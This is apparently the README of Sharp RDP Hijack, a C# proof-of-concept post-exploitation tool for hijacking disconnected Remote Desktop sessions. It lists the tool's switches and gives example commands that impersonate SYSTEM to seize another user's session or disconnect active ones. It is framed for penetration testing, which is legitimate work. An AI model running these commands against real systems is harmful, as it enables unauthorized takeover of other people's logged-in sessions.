


Sharp RDP Hijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions


RDP session hijacking is a post-exploitation technique for taking control of (forcefully) disconnected interactive login sessions. The technique is described in Mitre ATT&CK T1563 - Remote Service Session Hijacking: RDP Hijacking.



[*] Parameters:
    --tsquery=<host> : Query a host to identify RDP/TS session information (not required for other switches)
    --session=<ID> : Target session identifier
    --password=<User's Password> : Session password if known (otherwise optional - not required for disconnect switch)
    --console : Redirect session to console session instead of current (active) session
    --disconnect : Disconnect an active (remote) session

[*] Example Usage 1: Impersonate NT AUTHORITY\SYSTEM to hijack session #6 and redirect to the current session
    SharpRDPHijack.exe --session=6

[*] Example Usage 2: Impersonate NT AUTHORITY\SYSTEM to hijack session #2 and redirect to the console session
    SharpRDPHijack.exe --session=2 --console

[*] Example Usage 3: Hijack Remote Desktop session #4 with knowledge of the logged-on user's password
    SharpRDPHijack.exe --session=4 --password=P@ssw0rd

[*] Example Usage 4: Disconnect active session #3
    SharpRDPHijack.exe --session=3 --disconnect

[*] Example Usage 5: Query the local host for RDP/TS session information
    SharpRDPHijack.exe --tsquery=localhost

To Do

Other Notable Implementations


Sharp RDP Hijack is designed to help security professionals perform ethical and legal security assessments and penetration tests. Do not use for nefarious purposes.

Resources with Defensive Considerations
